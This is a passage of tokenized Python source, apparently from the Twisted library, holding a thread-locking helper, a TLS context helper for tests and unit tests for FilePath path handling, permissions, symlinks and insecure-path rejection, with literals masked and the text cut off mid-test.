<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> from functools import wraps <EOL> class DummyLock ( object ) : <EOL> """<STR_LIT>""" <EOL> def __reduce__ ( self ) : <EOL> return ( unpickle_lock , ( ) ) <EOL> def unpickle_lock ( ) : <EOL> if threadingmodule is not None : <EOL> return XLock ( ) <EOL> else : <EOL> return DummyLock ( ) <EOL> unpickle_lock . __safe_for_unpickling__ = True <EOL> def _synchPre ( self ) : <EOL> if '<STR_LIT>' not in self . __dict__ : <EOL> _synchLockCreator . acquire ( ) <EOL> if '<STR_LIT>' not in self . __dict__ : <EOL> self . __dict__ [ '<STR_LIT>' ] = XLock ( ) <EOL> _synchLockCreator . release ( ) <EOL> self . _threadable_lock . acquire ( ) <EOL> def _synchPost ( self ) : <EOL> self . _threadable_lock . release ( ) <EOL> def _sync ( klass , function ) : <EOL> @ wraps ( function ) <EOL> def sync ( self , * args , ** kwargs ) : <EOL> _synchPre ( self ) <EOL> try : <EOL> return function ( self , * args , ** kwargs ) <EOL> finally : <EOL> _synchPost ( self ) <EOL> return sync <EOL> def synchronize ( * klasses ) : <EOL> """<STR_LIT>""" <EOL> if threadingmodule is not None : <EOL> for klass in klasses : <EOL> for methodName in klass . synchronized : <EOL> sync = _sync ( klass , klass . __dict__ [ methodName ] ) <EOL> setattr ( klass , methodName , sync ) <EOL> def init ( with_threads = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> global threaded , _synchLockCreator , XLock <EOL> if with_threads : <EOL> if not threaded : <EOL> if threadingmodule is not None : <EOL> threaded = True <EOL> class XLock ( threadingmodule . 
_RLock , object ) : <EOL> def __reduce__ ( self ) : <EOL> return ( unpickle_lock , ( ) ) <EOL> _synchLockCreator = XLock ( ) <EOL> else : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> else : <EOL> if threaded : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> else : <EOL> pass <EOL> _dummyID = object ( ) <EOL> def getThreadID ( ) : <EOL> if threadingmodule is None : <EOL> return _dummyID <EOL> return threadingmodule . currentThread ( ) . ident <EOL> def isInIOThread ( ) : <EOL> """<STR_LIT>""" <EOL> return ioThread == getThreadID ( ) <EOL> def registerAsIOThread ( ) : <EOL> """<STR_LIT>""" <EOL> global ioThread <EOL> ioThread = getThreadID ( ) <EOL> ioThread = None <EOL> threaded = False <EOL> try : <EOL> import threading as threadingmodule <EOL> except ImportError : <EOL> threadingmodule = None <EOL> else : <EOL> init ( True ) <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> from twisted . python . compat import nativeString <EOL> from twisted . internet import ssl <EOL> from twisted . python . filepath import FilePath <EOL> from OpenSSL import SSL <EOL> certPath = nativeString ( FilePath ( __file__ . encode ( "<STR_LIT:utf-8>" ) <EOL> ) . sibling ( b"<STR_LIT>" ) . path ) <EOL> class ClientTLSContext ( ssl . ClientContextFactory ) : <EOL> isClient = <NUM_LIT:1> <EOL> def getContext ( self ) : <EOL> return SSL . Context ( SSL . TLSv1_METHOD ) <EOL> class ServerTLSContext : <EOL> isClient = <NUM_LIT:0> <EOL> def __init__ ( self , filename = certPath ) : <EOL> self . filename = filename <EOL> def getContext ( self ) : <EOL> ctx = SSL . Context ( SSL . TLSv1_METHOD ) <EOL> ctx . use_certificate_file ( self . filename ) <EOL> ctx . use_privatekey_file ( self . filename ) <EOL> return ctx </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> import os , time , pickle , errno , stat <EOL> import contextlib <EOL> from pprint import pformat <EOL> from twisted . python . compat import _PY3 <EOL> from twisted . python . win32 import WindowsError , ERROR_DIRECTORY <EOL> from twisted . python import filepath <EOL> from twisted . python . runtime import platform <EOL> from twisted . trial . unittest import SkipTest , SynchronousTestCase as TestCase <EOL> from zope . interface . verify import verifyObject <EOL> class BytesTestCase ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def mktemp ( self ) : <EOL> """<STR_LIT>""" <EOL> return TestCase . mktemp ( self ) . encode ( "<STR_LIT:utf-8>" ) <EOL> class AbstractFilePathTestCase ( BytesTestCase ) : <EOL> """<STR_LIT>""" <EOL> f1content = b"<STR_LIT>" <EOL> f2content = b"<STR_LIT>" <EOL> def _mkpath ( self , * p ) : <EOL> x = os . path . abspath ( os . path . join ( self . cmn , * p ) ) <EOL> self . all . append ( x ) <EOL> return x <EOL> def subdir ( self , * dirname ) : <EOL> os . mkdir ( self . _mkpath ( * dirname ) ) <EOL> def subfile ( self , * dirname ) : <EOL> return open ( self . _mkpath ( * dirname ) , "<STR_LIT:wb>" ) <EOL> def setUp ( self ) : <EOL> self . now = time . time ( ) <EOL> cmn = self . cmn = os . path . abspath ( self . mktemp ( ) ) <EOL> self . all = [ cmn ] <EOL> os . mkdir ( cmn ) <EOL> self . subdir ( b"<STR_LIT>" ) <EOL> f = self . subfile ( b"<STR_LIT>" ) <EOL> f . write ( self . f1content ) <EOL> f . close ( ) <EOL> f = self . subfile ( b"<STR_LIT>" , b"<STR_LIT>" ) <EOL> f . write ( self . f2content ) <EOL> f . close ( ) <EOL> self . subdir ( b'<STR_LIT>' ) <EOL> f = self . subfile ( b"<STR_LIT>" , b"<STR_LIT>" ) <EOL> f . close ( ) <EOL> f = self . subfile ( b"<STR_LIT>" , b"<STR_LIT>" ) <EOL> f . close ( ) <EOL> f = self . subfile ( b"<STR_LIT>" , b"<STR_LIT>" ) <EOL> f . close ( ) <EOL> self . path = filepath . FilePath ( cmn ) <EOL> self . 
root = filepath . FilePath ( b"<STR_LIT:/>" ) <EOL> def test_verifyObject ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( verifyObject ( filepath . IFilePath , self . path ) ) <EOL> def test_segmentsFromPositive ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> self . path . child ( b"<STR_LIT:a>" ) . child ( b"<STR_LIT:b>" ) . child ( b"<STR_LIT:c>" ) . segmentsFrom ( self . path ) , <EOL> [ b"<STR_LIT:a>" , b"<STR_LIT:b>" , b"<STR_LIT:c>" ] ) <EOL> def test_segmentsFromNegative ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> ValueError , <EOL> self . path . child ( b"<STR_LIT:a>" ) . child ( b"<STR_LIT:b>" ) . child ( b"<STR_LIT:c>" ) . segmentsFrom , <EOL> self . path . child ( b"<STR_LIT:d>" ) . child ( b"<STR_LIT:c>" ) . child ( b"<STR_LIT:e>" ) ) <EOL> def test_walk ( self ) : <EOL> """<STR_LIT>""" <EOL> x = [ foo . path for foo in self . path . walk ( ) ] <EOL> self . assertEqual ( set ( x ) , set ( self . all ) ) <EOL> def test_parents ( self ) : <EOL> """<STR_LIT>""" <EOL> L = [ ] <EOL> pathobj = self . path . child ( b"<STR_LIT:a>" ) . child ( b"<STR_LIT:b>" ) . child ( b"<STR_LIT:c>" ) <EOL> fullpath = pathobj . path <EOL> lastpath = fullpath <EOL> thispath = os . path . dirname ( fullpath ) <EOL> while lastpath != self . root . path : <EOL> L . append ( thispath ) <EOL> lastpath = thispath <EOL> thispath = os . path . dirname ( thispath ) <EOL> self . assertEqual ( [ x . path for x in pathobj . parents ( ) ] , L ) <EOL> def test_validSubdir ( self ) : <EOL> """<STR_LIT>""" <EOL> sub1 = self . path . child ( b'<STR_LIT>' ) <EOL> self . failUnless ( sub1 . exists ( ) , <EOL> "<STR_LIT>" ) <EOL> self . failUnless ( sub1 . isdir ( ) , <EOL> "<STR_LIT>" ) <EOL> self . failUnless ( not sub1 . isfile ( ) , <EOL> "<STR_LIT>" ) <EOL> self . failUnless ( not sub1 . islink ( ) , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( sub1 . 
listdir ( ) , <EOL> [ b'<STR_LIT>' ] ) <EOL> def test_invalidSubdir ( self ) : <EOL> """<STR_LIT>""" <EOL> sub2 = self . path . child ( b'<STR_LIT>' ) <EOL> self . failIf ( sub2 . exists ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_validFiles ( self ) : <EOL> """<STR_LIT>""" <EOL> f1 = self . path . child ( b'<STR_LIT>' ) <EOL> with contextlib . closing ( f1 . open ( ) ) as f : <EOL> self . assertEqual ( f . read ( ) , self . f1content ) <EOL> f2 = self . path . child ( b'<STR_LIT>' ) . child ( b'<STR_LIT>' ) <EOL> with contextlib . closing ( f2 . open ( ) ) as f : <EOL> self . assertEqual ( f . read ( ) , self . f2content ) <EOL> def test_multipleChildSegments ( self ) : <EOL> """<STR_LIT>""" <EOL> multiple = self . path . descendant ( [ b'<STR_LIT:a>' , b'<STR_LIT:b>' , b'<STR_LIT:c>' ] ) <EOL> single = self . path . child ( b'<STR_LIT:a>' ) . child ( b'<STR_LIT:b>' ) . child ( b'<STR_LIT:c>' ) <EOL> self . assertEqual ( multiple , single ) <EOL> def test_dictionaryKeys ( self ) : <EOL> """<STR_LIT>""" <EOL> f1 = self . path . child ( b'<STR_LIT>' ) <EOL> f1prime = self . path . child ( b'<STR_LIT>' ) <EOL> f2 = self . path . child ( b'<STR_LIT>' ) <EOL> dictoid = { } <EOL> dictoid [ f1 ] = <NUM_LIT:3> <EOL> dictoid [ f1prime ] = <NUM_LIT:4> <EOL> self . assertEqual ( dictoid [ f1 ] , <NUM_LIT:4> ) <EOL> self . assertEqual ( list ( dictoid . keys ( ) ) , [ f1 ] ) <EOL> self . assertTrue ( list ( dictoid . keys ( ) ) [ <NUM_LIT:0> ] is f1 ) <EOL> self . assertFalse ( list ( dictoid . keys ( ) ) [ <NUM_LIT:0> ] is f1prime ) <EOL> dictoid [ f2 ] = <NUM_LIT:5> <EOL> self . assertEqual ( dictoid [ f2 ] , <NUM_LIT:5> ) <EOL> self . assertEqual ( len ( dictoid ) , <NUM_LIT:2> ) <EOL> def test_dictionaryKeyWithString ( self ) : <EOL> """<STR_LIT>""" <EOL> f1 = self . path . child ( b'<STR_LIT>' ) <EOL> dictoid = { f1 : '<STR_LIT:hello>' } <EOL> dictoid [ f1 . path ] = '<STR_LIT>' <EOL> self . 
assertEqual ( len ( dictoid ) , <NUM_LIT:2> ) <EOL> def test_childrenNonexistentError ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( filepath . UnlistableError , <EOL> self . path . child ( b'<STR_LIT>' ) . children ) <EOL> def test_childrenNotDirectoryError ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( filepath . UnlistableError , <EOL> self . path . child ( b'<STR_LIT>' ) . children ) <EOL> def test_newTimesAreFloats ( self ) : <EOL> """<STR_LIT>""" <EOL> for p in self . path , self . path . child ( b'<STR_LIT>' ) : <EOL> self . assertEqual ( type ( p . getAccessTime ( ) ) , float ) <EOL> self . assertEqual ( type ( p . getModificationTime ( ) ) , float ) <EOL> self . assertEqual ( type ( p . getStatusChangeTime ( ) ) , float ) <EOL> def test_oldTimesAreInts ( self ) : <EOL> """<STR_LIT>""" <EOL> for p in self . path , self . path . child ( b'<STR_LIT>' ) : <EOL> self . assertEqual ( type ( p . getatime ( ) ) , int ) <EOL> self . assertEqual ( type ( p . getmtime ( ) ) , int ) <EOL> self . assertEqual ( type ( p . getctime ( ) ) , int ) <EOL> class FakeWindowsPath ( filepath . FilePath ) : <EOL> """<STR_LIT>""" <EOL> def listdir ( self ) : <EOL> """<STR_LIT>""" <EOL> raise WindowsError ( <EOL> ERROR_DIRECTORY , <EOL> "<STR_LIT>" ) <EOL> class ListingCompatibilityTests ( BytesTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_windowsErrorExcept ( self ) : <EOL> """<STR_LIT>""" <EOL> fwp = FakeWindowsPath ( self . mktemp ( ) ) <EOL> self . assertRaises ( filepath . UnlistableError , fwp . children ) <EOL> self . assertRaises ( WindowsError , fwp . children ) <EOL> def test_alwaysCatchOSError ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> self . assertRaises ( OSError , fp . children ) <EOL> def test_keepOriginalAttributes ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> ose = self . assertRaises ( OSError , fp . children ) <EOL> d1 = list ( ose . 
__dict__ . keys ( ) ) <EOL> d1 . remove ( '<STR_LIT>' ) <EOL> d2 = list ( ose . originalException . __dict__ . keys ( ) ) <EOL> d1 . sort ( ) <EOL> d2 . sort ( ) <EOL> self . assertEqual ( d1 , d2 ) <EOL> class ExplodingFile : <EOL> """<STR_LIT>""" <EOL> closed = False <EOL> def read ( self , n = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> raise IOError ( ) <EOL> def write ( self , what ) : <EOL> """<STR_LIT>""" <EOL> raise IOError ( ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> self . closed = True <EOL> class TrackingFilePath ( filepath . FilePath ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , path , alwaysCreate = False , trackingList = None ) : <EOL> filepath . FilePath . __init__ ( self , path , alwaysCreate ) <EOL> if trackingList is None : <EOL> trackingList = [ ] <EOL> self . trackingList = trackingList <EOL> self . openedFiles = [ ] <EOL> def open ( self , * a , ** k ) : <EOL> """<STR_LIT>""" <EOL> f = filepath . FilePath . open ( self , * a , ** k ) <EOL> self . openedFiles . append ( f ) <EOL> return f <EOL> def openedPaths ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ path for path in self . trackingList if path . openedFiles ] <EOL> def clonePath ( self , name ) : <EOL> """<STR_LIT>""" <EOL> clone = TrackingFilePath ( name , trackingList = self . trackingList ) <EOL> self . trackingList . append ( clone ) <EOL> return clone <EOL> class ExplodingFilePath ( filepath . FilePath ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , pathName , originalExploder = None ) : <EOL> """<STR_LIT>""" <EOL> filepath . FilePath . __init__ ( self , pathName ) <EOL> if originalExploder is None : <EOL> originalExploder = self <EOL> self . _originalExploder = originalExploder <EOL> def open ( self , mode = None ) : <EOL> """<STR_LIT>""" <EOL> f = self . _originalExploder . fp = ExplodingFile ( ) <EOL> return f <EOL> def clonePath ( self , name ) : <EOL> return ExplodingFilePath ( name , self . 
_originalExploder ) <EOL> class PermissionsTestCase ( BytesTestCase ) : <EOL> """<STR_LIT>""" <EOL> def assertNotUnequal ( self , first , second , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if first != second : <EOL> if msg is None : <EOL> msg = '<STR_LIT>' ; <EOL> if len ( msg ) > <NUM_LIT:0> : <EOL> msg += '<STR_LIT:\n>' <EOL> raise self . failureException ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( msg , pformat ( first ) , pformat ( second ) ) ) <EOL> return first <EOL> def test_rwxFromBools ( self ) : <EOL> """<STR_LIT>""" <EOL> for r in ( True , False ) : <EOL> for w in ( True , False ) : <EOL> for x in ( True , False ) : <EOL> rwx = filepath . RWX ( r , w , x ) <EOL> self . assertEqual ( rwx . read , r ) <EOL> self . assertEqual ( rwx . write , w ) <EOL> self . assertEqual ( rwx . execute , x ) <EOL> rwx = filepath . RWX ( True , True , True ) <EOL> self . assertTrue ( rwx . read and rwx . write and rwx . execute ) <EOL> def test_rwxEqNe ( self ) : <EOL> """<STR_LIT>""" <EOL> for r in ( True , False ) : <EOL> for w in ( True , False ) : <EOL> for x in ( True , False ) : <EOL> self . assertEqual ( filepath . RWX ( r , w , x ) , <EOL> filepath . RWX ( r , w , x ) ) <EOL> self . assertNotUnequal ( filepath . RWX ( r , w , x ) , <EOL> filepath . RWX ( r , w , x ) ) <EOL> self . assertNotEqual ( filepath . RWX ( True , True , True ) , <EOL> filepath . RWX ( True , True , False ) ) <EOL> self . assertNotEqual ( <NUM_LIT:3> , filepath . RWX ( True , True , True ) ) <EOL> def test_rwxShorthand ( self ) : <EOL> """<STR_LIT>""" <EOL> def getChar ( val , letter ) : <EOL> if val : <EOL> return letter <EOL> return '<STR_LIT:->' <EOL> for r in ( True , False ) : <EOL> for w in ( True , False ) : <EOL> for x in ( True , False ) : <EOL> rwx = filepath . RWX ( r , w , x ) <EOL> self . assertEqual ( rwx . shorthand ( ) , <EOL> getChar ( r , '<STR_LIT:r>' ) + <EOL> getChar ( w , '<STR_LIT:w>' ) + <EOL> getChar ( x , '<STR_LIT:x>' ) ) <EOL> self . assertEqual ( filepath . 
RWX ( True , False , True ) . shorthand ( ) , "<STR_LIT>" ) <EOL> def test_permissionsFromStat ( self ) : <EOL> """<STR_LIT>""" <EOL> def _rwxFromStat ( statModeInt , who ) : <EOL> def getPermissionBit ( what , who ) : <EOL> return ( statModeInt & <EOL> getattr ( stat , "<STR_LIT>" % ( what , who ) ) ) > <NUM_LIT:0> <EOL> return filepath . RWX ( * [ getPermissionBit ( what , who ) for what in <EOL> ( '<STR_LIT:R>' , '<STR_LIT>' , '<STR_LIT:X>' ) ] ) <EOL> for u in range ( <NUM_LIT:0> , <NUM_LIT:8> ) : <EOL> for g in range ( <NUM_LIT:0> , <NUM_LIT:8> ) : <EOL> for o in range ( <NUM_LIT:0> , <NUM_LIT:8> ) : <EOL> chmodString = "<STR_LIT>" % ( u , g , o ) <EOL> chmodVal = int ( chmodString , <NUM_LIT:8> ) <EOL> perm = filepath . Permissions ( chmodVal ) <EOL> self . assertEqual ( perm . user , <EOL> _rwxFromStat ( chmodVal , "<STR_LIT>" ) , <EOL> "<STR_LIT>" % <EOL> ( chmodString , perm . user ) ) <EOL> self . assertEqual ( perm . group , <EOL> _rwxFromStat ( chmodVal , "<STR_LIT>" ) , <EOL> "<STR_LIT>" % <EOL> ( chmodString , perm . group ) ) <EOL> self . assertEqual ( perm . other , <EOL> _rwxFromStat ( chmodVal , "<STR_LIT>" ) , <EOL> "<STR_LIT>" % <EOL> ( chmodString , perm . other ) ) <EOL> perm = filepath . Permissions ( <NUM_LIT> ) <EOL> for who in ( "<STR_LIT:user>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> for what in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> self . assertTrue ( getattr ( getattr ( perm , who ) , what ) ) <EOL> def test_permissionsEq ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( filepath . Permissions ( <NUM_LIT> ) , <EOL> filepath . Permissions ( <NUM_LIT> ) ) <EOL> self . assertNotUnequal ( filepath . Permissions ( <NUM_LIT> ) , <EOL> filepath . Permissions ( <NUM_LIT> ) ) <EOL> self . assertNotEqual ( filepath . Permissions ( <NUM_LIT> ) , <EOL> filepath . Permissions ( <NUM_LIT> ) ) <EOL> self . assertNotEqual ( <NUM_LIT:3> , filepath . 
Permissions ( <NUM_LIT> ) ) <EOL> def test_permissionsShorthand ( self ) : <EOL> """<STR_LIT>""" <EOL> for u in range ( <NUM_LIT:0> , <NUM_LIT:8> ) : <EOL> for g in range ( <NUM_LIT:0> , <NUM_LIT:8> ) : <EOL> for o in range ( <NUM_LIT:0> , <NUM_LIT:8> ) : <EOL> perm = filepath . Permissions ( int ( "<STR_LIT>" % ( u , g , o ) , <NUM_LIT:8> ) ) <EOL> self . assertEqual ( perm . shorthand ( ) , <EOL> '<STR_LIT>' . join ( x . shorthand ( ) for x in ( <EOL> perm . user , perm . group , perm . other ) ) ) <EOL> self . assertEqual ( filepath . Permissions ( <NUM_LIT> ) . shorthand ( ) , "<STR_LIT>" ) <EOL> class FilePathTestCase ( AbstractFilePathTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_chmod ( self ) : <EOL> """<STR_LIT>""" <EOL> for mode in ( <NUM_LIT> , <NUM_LIT> ) : <EOL> self . path . child ( b"<STR_LIT>" ) . chmod ( mode ) <EOL> self . assertEqual ( <EOL> stat . S_IMODE ( os . stat ( self . path . child ( b"<STR_LIT>" ) . path ) . st_mode ) , <EOL> mode ) <EOL> def symlink ( self , target , name ) : <EOL> """<STR_LIT>""" <EOL> if getattr ( os , '<STR_LIT>' , None ) is None : <EOL> raise SkipTest ( <EOL> "<STR_LIT>" ) <EOL> os . symlink ( target , name ) <EOL> def createLinks ( self ) : <EOL> """<STR_LIT>""" <EOL> subdir = self . path . child ( b"<STR_LIT>" ) <EOL> self . symlink ( subdir . path , self . _mkpath ( b"<STR_LIT>" ) ) <EOL> self . symlink ( subdir . child ( b"<STR_LIT>" ) . path , self . _mkpath ( b"<STR_LIT>" ) ) <EOL> self . symlink ( subdir . child ( b"<STR_LIT>" ) . path , <EOL> self . _mkpath ( b"<STR_LIT>" , b"<STR_LIT>" ) ) <EOL> def test_realpathSymlink ( self ) : <EOL> """<STR_LIT>""" <EOL> self . createLinks ( ) <EOL> self . symlink ( self . path . child ( b"<STR_LIT>" ) . path , <EOL> self . path . child ( b"<STR_LIT>" ) . path ) <EOL> self . assertEqual ( self . path . child ( b"<STR_LIT>" ) . realpath ( ) , <EOL> self . path . child ( b"<STR_LIT>" ) . 
child ( b"<STR_LIT>" ) ) <EOL> def test_realpathCyclicalSymlink ( self ) : <EOL> """<STR_LIT>""" <EOL> self . symlink ( self . path . child ( b"<STR_LIT>" ) . path , self . path . child ( b"<STR_LIT>" ) . path ) <EOL> self . symlink ( self . path . child ( b"<STR_LIT>" ) . path , self . path . child ( b"<STR_LIT>" ) . path ) <EOL> self . assertRaises ( filepath . LinkError , <EOL> self . path . child ( b"<STR_LIT>" ) . realpath ) <EOL> def test_realpathNoSymlink ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . path . child ( b"<STR_LIT>" ) . realpath ( ) , <EOL> self . path . child ( b"<STR_LIT>" ) ) <EOL> def test_walkCyclicalSymlink ( self ) : <EOL> """<STR_LIT>""" <EOL> self . createLinks ( ) <EOL> self . symlink ( self . path . child ( b"<STR_LIT>" ) . path , <EOL> self . path . child ( b"<STR_LIT>" ) . child ( b"<STR_LIT>" ) . path ) <EOL> def iterateOverPath ( ) : <EOL> return [ foo . path for foo in self . path . walk ( ) ] <EOL> self . assertRaises ( filepath . LinkError , iterateOverPath ) <EOL> def test_walkObeysDescendWithCyclicalSymlinks ( self ) : <EOL> """<STR_LIT>""" <EOL> self . createLinks ( ) <EOL> self . symlink ( self . path . child ( b"<STR_LIT>" ) . path , <EOL> self . path . child ( b"<STR_LIT>" ) . child ( b"<STR_LIT>" ) . path ) <EOL> def noSymLinks ( path ) : <EOL> return not path . islink ( ) <EOL> def iterateOverPath ( ) : <EOL> return [ foo . path for foo in self . path . walk ( descend = noSymLinks ) ] <EOL> self . assertTrue ( iterateOverPath ( ) ) <EOL> def test_walkObeysDescend ( self ) : <EOL> """<STR_LIT>""" <EOL> self . createLinks ( ) <EOL> def noSymLinks ( path ) : <EOL> return not path . islink ( ) <EOL> x = [ foo . path for foo in self . path . walk ( descend = noSymLinks ) ] <EOL> self . assertEqual ( set ( x ) , set ( self . all ) ) <EOL> def test_getAndSet ( self ) : <EOL> content = b'<STR_LIT>' <EOL> self . path . child ( b'<STR_LIT>' ) . setContent ( content ) <EOL> newcontent = self . path . 
child ( b'<STR_LIT>' ) . getContent ( ) <EOL> self . assertEqual ( content , newcontent ) <EOL> content = b'<STR_LIT:content>' <EOL> self . path . child ( b'<STR_LIT>' ) . setContent ( content , b'<STR_LIT>' ) <EOL> newcontent = self . path . child ( b'<STR_LIT>' ) . getContent ( ) <EOL> self . assertEqual ( content , newcontent ) <EOL> def test_getContentFileClosing ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = ExplodingFilePath ( b"<STR_LIT>" ) <EOL> self . assertRaises ( IOError , fp . getContent ) <EOL> self . assertTrue ( fp . fp . closed ) <EOL> def test_symbolicLink ( self ) : <EOL> """<STR_LIT>""" <EOL> s4 = self . path . child ( b"<STR_LIT>" ) <EOL> s3 = self . path . child ( b"<STR_LIT>" ) <EOL> self . symlink ( s3 . path , s4 . path ) <EOL> self . assertTrue ( s4 . islink ( ) ) <EOL> self . assertFalse ( s3 . islink ( ) ) <EOL> self . assertTrue ( s4 . isdir ( ) ) <EOL> self . assertTrue ( s3 . isdir ( ) ) <EOL> def test_linkTo ( self ) : <EOL> """<STR_LIT>""" <EOL> targetLinks = [ <EOL> ( self . path . child ( b"<STR_LIT>" ) , self . path . child ( b"<STR_LIT>" ) ) , <EOL> ( self . path . child ( b"<STR_LIT>" ) . child ( b"<STR_LIT>" ) , <EOL> self . path . child ( b"<STR_LIT>" ) ) <EOL> ] <EOL> for target , link in targetLinks : <EOL> target . linkTo ( link ) <EOL> self . assertTrue ( link . islink ( ) , "<STR_LIT>" ) <EOL> self . assertEqual ( target . isdir ( ) , link . isdir ( ) ) <EOL> self . assertEqual ( target . isfile ( ) , link . isfile ( ) ) <EOL> def test_linkToErrors ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( OSError , self . path . child ( b"<STR_LIT>" ) . linkTo , <EOL> self . path . child ( b'<STR_LIT>' ) . child ( b'<STR_LIT>' ) ) <EOL> self . assertRaises ( OSError , self . path . child ( b"<STR_LIT>" ) . linkTo , <EOL> self . path . child ( b'<STR_LIT>' ) . child ( b'<STR_LIT>' ) ) <EOL> if not getattr ( os , "<STR_LIT>" , None ) : <EOL> skipMsg = "<STR_LIT>" <EOL> test_symbolicLink . skip = skipMsg <EOL> test_linkTo . 
skip = skipMsg <EOL> test_linkToErrors . skip = skipMsg <EOL> def testMultiExt ( self ) : <EOL> f3 = self . path . child ( b'<STR_LIT>' ) . child ( b'<STR_LIT>' ) <EOL> exts = b'<STR_LIT>' , b'<STR_LIT>' , b'<STR_LIT>' , b'<STR_LIT>' , b'<STR_LIT>' <EOL> self . failIf ( f3 . siblingExtensionSearch ( * exts ) ) <EOL> f3e = f3 . siblingExtension ( b"<STR_LIT>" ) <EOL> f3e . touch ( ) <EOL> self . failIf ( not f3 . siblingExtensionSearch ( * exts ) . exists ( ) ) <EOL> self . failIf ( not f3 . siblingExtensionSearch ( b'<STR_LIT:*>' ) . exists ( ) ) <EOL> f3e . remove ( ) <EOL> self . failIf ( f3 . siblingExtensionSearch ( * exts ) ) <EOL> def testPreauthChild ( self ) : <EOL> fp = filepath . FilePath ( b'<STR_LIT:.>' ) <EOL> fp . preauthChild ( b'<STR_LIT>' ) <EOL> self . assertRaises ( filepath . InsecurePath , fp . child , b'<STR_LIT>' ) <EOL> def testStatCache ( self ) : <EOL> p = self . path . child ( b'<STR_LIT>' ) <EOL> p . touch ( ) <EOL> self . assertEqual ( p . getsize ( ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( abs ( p . getmtime ( ) - time . time ( ) ) // <NUM_LIT:20> , <NUM_LIT:0> ) <EOL> self . assertEqual ( abs ( p . getctime ( ) - time . time ( ) ) // <NUM_LIT:20> , <NUM_LIT:0> ) <EOL> self . assertEqual ( abs ( p . getatime ( ) - time . time ( ) ) // <NUM_LIT:20> , <NUM_LIT:0> ) <EOL> self . assertEqual ( p . exists ( ) , True ) <EOL> self . assertEqual ( p . exists ( ) , True ) <EOL> os . remove ( p . path ) <EOL> self . assertEqual ( p . exists ( ) , True ) <EOL> p . restat ( reraise = False ) <EOL> self . assertEqual ( p . exists ( ) , False ) <EOL> self . assertEqual ( p . islink ( ) , False ) <EOL> self . assertEqual ( p . isdir ( ) , False ) <EOL> self . assertEqual ( p . isfile ( ) , False ) <EOL> def testPersist ( self ) : <EOL> newpath = pickle . loads ( pickle . dumps ( self . path ) ) <EOL> self . assertEqual ( self . path . __class__ , newpath . __class__ ) <EOL> self . assertEqual ( self . path . path , newpath . 
path ) <EOL> def testInsecureUNIX ( self ) : <EOL> self . assertRaises ( filepath . InsecurePath , self . path . child , b"<STR_LIT:..>" ) <EOL> self . assertRaises ( filepath . InsecurePath , self . path . child , b"<STR_LIT>" ) <EOL> self . assertRaises ( filepath . InsecurePath , self . path . child , b"<STR_LIT>" ) <EOL> def testInsecureWin32 ( self ) : <EOL> self . assertRaises ( filepath . InsecurePath , self . path . child , b"<STR_LIT>" ) <EOL> self . assertRaises ( filepath . InsecurePath , self . path . child , b"<STR_LIT>" ) <EOL> if platform . getType ( ) != '<STR_LIT:win32>' : <EOL> testInsecureWin32 . skip = "<STR_LIT>" <EOL> def testInsecureWin32Whacky ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( filepath . InsecurePath , self . path . child , b"<STR_LIT>" ) <EOL> self . assertRaises ( filepath . InsecurePath , self . path . child , b"<STR_LIT>" ) <EOL> self . assertRaises ( filepath . InsecurePath , self . path . child , r"<STR_LIT>" ) <EOL> if platform . getType ( ) != '<STR_LIT:win32>' : <EOL> testInsecureWin32Whacky . skip = "<STR_LIT>" <EOL> def testComparison ( self ) : <EOL> self . assertEqual ( filepath . FilePath ( b'<STR_LIT:a>' ) , <EOL> filepath . FilePath ( b'<STR_LIT:a>' ) ) <EOL> self . failUnless ( filepath . FilePath ( b'<STR_LIT:z>' ) > <EOL> filepath . FilePath ( b'<STR_LIT:a>' ) ) <EOL> self . failUnless ( filepath . FilePath ( b'<STR_LIT:z>' ) >= <EOL> filepath . FilePath ( b'<STR_LIT:a>' ) ) <EOL> self . failUnless ( filepath . FilePath ( b'<STR_LIT:a>' ) >= <EOL> filepath . FilePath ( b'<STR_LIT:a>' ) ) <EOL> self . failUnless ( filepath . FilePath ( b'<STR_LIT:a>' ) <= <EOL> filepath . FilePath ( b'<STR_LIT:a>' ) ) <EOL> self . failUnless ( filepath . FilePath ( b'<STR_LIT:a>' ) < <EOL> filepath . FilePath ( b'<STR_LIT:z>' ) ) <EOL> self . failUnless ( filepath . FilePath ( b'<STR_LIT:a>' ) <= <EOL> filepath . FilePath ( b'<STR_LIT:z>' ) ) <EOL> self . failUnless ( filepath . 
